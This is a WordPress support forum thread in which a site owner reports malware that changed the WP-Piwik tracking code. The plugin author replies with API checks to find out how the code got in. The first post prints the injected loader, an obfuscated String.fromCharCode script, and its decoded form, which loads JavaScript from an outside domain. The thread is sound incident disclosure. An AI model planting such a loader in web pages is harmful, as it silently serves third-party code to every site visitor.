Title: wp-piwik-tracking_code : malicious code
Last modified: January 7, 2018

---

# wp-piwik-tracking_code : malicious code

 *  [casimarc](https://wordpress.org/support/users/casimarc/)
 * (@casimarc)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/wp-piwik-tracking_code-malicious-code/)
 * hi,
 * not really sure if it’s the good place but i was hit by a malware which modified
   my wp-piwik-tracking_code to load code from another site;
 * my versions (wordpress and wp-piwik) wasn’t up-to-date so i’m guilty but i think
   i’m not alone in this case.
 * wp-piwik-tracking_code was modified to :
    <script>var sc = document.createElement(
   String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(
   104, 116, 116, 112, 115, 58, 47, 47, 106, 97, 114, 46, 116, 114, 97, 102, 102,
   105, 99, 98, 101, 116, 116, 101, 114, 46, 98, 105, 122, 47, 115, 46, 106, 115);
   sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 
   99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104,
   101, 97, 100))[0].appendChild(sc);</script>
 * which can be decoded to
    “var sc = document.createElement(“script”); sc.type 
   = “text/javascript”; sc.src = “[https://jar.trafficbetter.biz/s.js&#8221](https://jar.trafficbetter.biz/s.js&#8221);;
   document.head.appendChild(sc);
 * regards,

Viewing 1 replies (of 1 total)

 *  Plugin Author [braekling](https://wordpress.org/support/users/braekling/)
 * (@braekling)
 * [8 years, 5 months ago](https://wordpress.org/support/topic/wp-piwik-tracking_code-malicious-code/#post-9846603)
 * Did you also check your Piwik setup? Does Piwik itself deliver the malformed 
   tracking code (so the attacker used Piwik) or was it directly injected to WordPress
   or via WP-Piwik?
 * You can test Piwik’s API response by executing…
    `{PIWIK_URL}?module=API&method
   =SitesManager.getJavascriptTag&idSite={SITE_ID}&piwikUrl=&format=xml&token_auth
   ={AUTH_TOKEN}` and… `{PIWIK_URL}?module=API&method=SitesManager.getImageTrackingCode&
   idSite={SITE_ID}&piwikUrl=&format=xml&token_auth={AUTH_TOKEN}`
 * This issue was reported 3-4 times the last months, but no reporter ever gave 
   a feedback on how the attacker intruded. Currently, there are no known vulnerabilities
   in Piwik or WP-Piwik, and without further information we also have no chance 
   to test this in more detail. See also: [https://github.com/braekling/WP-Matomo/issues/66](https://github.com/braekling/WP-Matomo/issues/66)
    -  This reply was modified 8 years, 5 months ago by [braekling](https://wordpress.org/support/users/braekling/).

Viewing 1 replies (of 1 total)

The topic ‘wp-piwik-tracking_code : malicious code’ is closed to new replies.

 * ![](https://ps.w.org/wp-piwik/assets/icon-256x256.png?rev=3529668)
 * [Connect Matomo - Analytics Dashboard for WordPress](https://wordpress.org/plugins/wp-piwik/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wp-piwik/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wp-piwik/)
 * [Active Topics](https://wordpress.org/support/plugin/wp-piwik/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wp-piwik/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wp-piwik/reviews/)

 * 1 reply
 * 2 participants
 * Last reply from: [braekling](https://wordpress.org/support/users/braekling/)
 * Last activity: [8 years, 5 months ago](https://wordpress.org/support/topic/wp-piwik-tracking_code-malicious-code/#post-9846603)
 * Status: not a support question